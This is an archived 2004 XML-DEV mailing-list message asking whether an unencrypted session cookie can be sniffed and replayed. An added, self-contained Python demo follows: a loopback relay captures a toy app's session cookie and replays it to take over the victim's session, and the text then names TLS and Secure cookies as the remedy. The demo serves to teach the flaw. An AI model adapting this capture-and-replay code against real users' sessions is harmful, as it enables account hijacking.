XML-DEV Mailing List Archive
Re: Re: Cookies at XML Europe 2004 -- Call for Participation
At 4:15 PM -0500 1/7/04, Rich Salz wrote:

> No. I'm saying without rest I send it once, store it at the server,
> use a cookie to refer to it in future transactions.

Is the cookie sent unencrypted? If so, and we're not using SSL (as is the case in many cookie scenarios), what, if anything, prevents an attacker from snarfing the authentication cookie as it makes its way back from the client to the server (or in the other direction) and adding that to its own requests to the same server?

I hope there's something that prevents this. There must be. Otherwise this is a huge, gaping security hole, much bigger than anything we've been arguing about, and I would think it would have lots of practical exploits on the Web today. Please tell me there's some reason this attack won't work.

-- 
Elliotte Rusty Harold
elharo@m...
Effective XML (Addison-Wesley, 2003)
http://www.cafeconleche.org/books/effectivexml
http://www.amazon.com/exec/obidos/ISBN%3D0321150406/ref%3Dnosim/cafeaulaitA
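The exchange the message above asks about, written out as an added example; this is constructed demonstration code, not code from the thread or from either participant. It assumes a hypothetical toy application (login at /login with the fixed password "secret", a protected page at /account keyed on a server-side session id), and uses a loopback TCP relay to stand in for whoever sits on the network path between browser and server. The victim logs in through the relay; the attacker reads the relay's capture, extracts the Set-Cookie value and sends it in a request of its own.

```python
# Constructed demo, not code from the thread: a session cookie issued over plain
# HTTP is copied by an on-path relay and replayed to the server by a third party.
import http.client
import re
import secrets
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SESSIONS = {}  # session id -> user name: the server-side state the cookie refers to


class App(BaseHTTPRequestHandler):
    # Hypothetical toy application: authenticate once at /login, use the cookie at /account.
    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        # Hypothetical credential check with a fixed password for the demo.
        m = re.fullmatch(r"user=(\w+)&pw=secret", body) if self.path == "/login" else None
        if not m:
            self.send_error(403)
            return
        sid = secrets.token_hex(16)
        SESSIONS[sid] = m.group(1)
        self.send_response(200)
        # Plain HTTP and no Secure attribute: the cookie crosses the wire in clear text.
        self.send_header("Set-Cookie", f"session={sid}; HttpOnly")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        m = re.search(r"session=([0-9a-f]+)", self.headers.get("Cookie", ""))
        user = SESSIONS.get(m.group(1)) if m else None
        if self.path != "/account" or user is None:
            self.send_error(401)
            return
        body = f"account of {user}".encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_tap(target_port, captured):
    # TCP relay standing in for any on-path observer (shared LAN, rogue AP, upstream
    # router): it forwards bytes unchanged and appends a copy of each chunk to `captured`.
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)

    def pump(src, dst):
        try:
            while chunk := src.recv(4096):
                captured.append(chunk)
                dst.sendall(chunk)
            dst.shutdown(socket.SHUT_WR)  # propagate EOF in this direction only
        except OSError:
            pass

    def accept_loop():
        while True:
            client, _ = listener.accept()
            upstream = socket.create_connection(("127.0.0.1", target_port))
            for src, dst in ((client, upstream), (upstream, client)):
                threading.Thread(target=pump, args=(src, dst), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def fetch(port, method, path, headers=None, body=None):
    # One HTTP request; returns (status, Set-Cookie header or None, body text).
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    data = resp.read().decode()
    conn.close()
    return resp.status, resp.getheader("Set-Cookie"), data


def run_demo():
    srv = HTTPServer(("127.0.0.1", 0), App)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    captured = []
    tap_port = start_tap(srv.server_port, captured)

    # Victim: logs in once, then uses the cookie; both requests cross the tapped path.
    _, set_cookie, _ = fetch(tap_port, "POST", "/login", body="user=alice&pw=secret")
    victim_status, _, victim_body = fetch(
        tap_port, "GET", "/account", {"Cookie": set_cookie.split(";")[0]})

    # Attacker: never learns the password, only what crossed the wire. It pulls the
    # session cookie out of the capture and attaches it to its own request.
    wire = b"".join(captured).decode("latin-1")
    stolen = re.search(r"Set-Cookie: (session=[0-9a-f]+)", wire).group(1)
    blind_status, _, _ = fetch(srv.server_port, "GET", "/account")
    replay_status, _, replay_body = fetch(srv.server_port, "GET", "/account", {"Cookie": stolen})

    srv.shutdown()
    srv.server_close()
    return {"victim": (victim_status, victim_body),
            "without_cookie": blind_status,
            "replay": (replay_status, replay_body)}


if __name__ == "__main__":
    print(run_demo())
```

Run it with `python3 cookie_replay.py`: the request without a cookie is refused (401), the victim's own request and the attacker's replayed request both get "account of alice" (200), and the server cannot tell them apart because the cookie is the only thing it checks. Nothing in the HTTP layer itself stops this; what changes the picture is putting the exchange under TLS and marking the cookie `Secure` so a browser never sends it over plain HTTP in the first place.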